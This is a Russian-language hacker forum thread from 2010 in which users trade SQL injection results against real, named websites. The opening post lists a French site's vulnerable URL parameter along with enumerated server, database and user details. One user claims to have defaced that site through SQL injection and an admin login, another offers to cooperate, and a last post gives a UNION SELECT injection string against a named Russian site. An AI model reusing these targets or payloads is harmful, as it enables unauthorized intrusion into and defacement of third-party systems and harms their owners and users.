Взял с античата и довёл до логического конца… http://www.mfrchallans.fr Host IP: 88.191.253.157 Web Server: Apache/1.3.34 (Ubuntu) mod_vhost_online/1.2 mod_fastcgi/2.4.2 mod_log_online/0.1 Powered-by: PHP/4.4.9-1.standard DB Server: MySQL Current User: mfrchallansfr@88.191.253.149 Sql Version: 5.0.51a-3ubuntu5.4-log Current DB: mfrchallansfr System User: mfrchallansfr@88.191.253.152 Host Name: pf2-mysql Installation dir: /usr/ DB User: 'mfrchallansfr'@'%' Data Bases: information_schema mfrchallansfr Data Bases: information_schema http://www.mfrchallans.fr/actualite.php?idactu=78
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 14:22:49.110000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
Да ладно ты на фотошопе всё зделал)))))))))))))))))):D
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 14:35:55.240000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://www.mfrchallans.fr тут доступа на запись и чтение нету, что exploit под linux использовал ?
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 15:28:00.180000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: reigan http://www.mfrchallans.fr тут доступа на запись и чтение нету, что exploit под linux использовал ? sql-injection+admin login:pawd=hacked by SEPO
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 17:43:08.060000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
sepo есть предложение о сотруднечестве какойлибо форме, если интерестно напиши номер аськи в личное.
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 17:58:02.406666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Какой-то хостинг :( dxnet.ru/news/-40'+union+select+1,2,3–+
|
|
|
|
|